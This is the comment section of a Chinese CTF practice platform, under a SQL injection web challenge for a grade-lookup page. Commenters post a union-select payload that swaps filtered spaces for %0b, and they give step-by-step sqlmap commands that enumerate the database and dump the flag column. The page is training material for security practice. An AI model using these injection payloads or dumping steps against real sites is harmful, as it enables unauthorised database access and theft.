成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 9805
提  示:
描  述:
来源山科大ctf
评论
lysandria 2年前

过滤了一些东西,空格用%0b绕过。payload:id=-1' union%0bselect%0bgroup_concat(skctf_flag),2,3,4%0bfrom fl4g#

回复 0

15338641414 2年前

输入框的sql注入

回复 0

Hey0iopklh 2年前

'闭合,union注入

回复 0

落叶满阶红 2年前

这题啊,,学了sqlmap使用方法。。自动干进去了,python2 sqlmap.py -u “URL地址” --data=”id=1” --current-db查询当前使用数据库,-D skctf(库名) --tables 查下面所有表,-T fl4g(表名)--columns列出所有的字段名,-C skctf_flag --dump列出字段内容,找到flag

回复 9

02 3年前

有的方法flag根本出不来

回复 0

w1707154109 3年前

超级简单的sql

回复 0

放鹤 3年前

为什么提交的flag不对

回复 0
MONSTEinCAT 2年前

要提交两次才行

回复 0

夜雨 3年前

简单的sql注入

回复 2

Kkkkkirs 3年前

为什么打开环境是 [什么也没有。]啊

回复 0

落日星辰 3年前

分享博客:https://blog.csdn.net/m_de_g/article/details/120055108

回复 4

WriteUp

image
harry

2 金币

评分(21)

解题动态

fenglingzi 攻破了该题 10小时前
是lwj 攻破了该题 11小时前
clearspring 攻破了该题 15小时前
402713793 攻破了该题 15小时前
LoadOverload 攻破了该题 15小时前
脚本萌新 攻破了该题 15小时前
wdyisdsb 攻破了该题 16小时前
19375083035 攻破了该题 16小时前
tx123432 攻破了该题 16小时前
13327252950 攻破了该题 16小时前
hh1111 攻破了该题 16小时前
2648662300 攻破了该题 16小时前
xxjjyy 攻破了该题 16小时前
荷湫情zero 攻破了该题 16小时前
19032886621 攻破了该题 16小时前
18817143007 攻破了该题 16小时前
llllly 攻破了该题 16小时前
杨驰坤 攻破了该题 16小时前
滞活幽门影 攻破了该题 17小时前
18975432965 攻破了该题 17小时前
问题反馈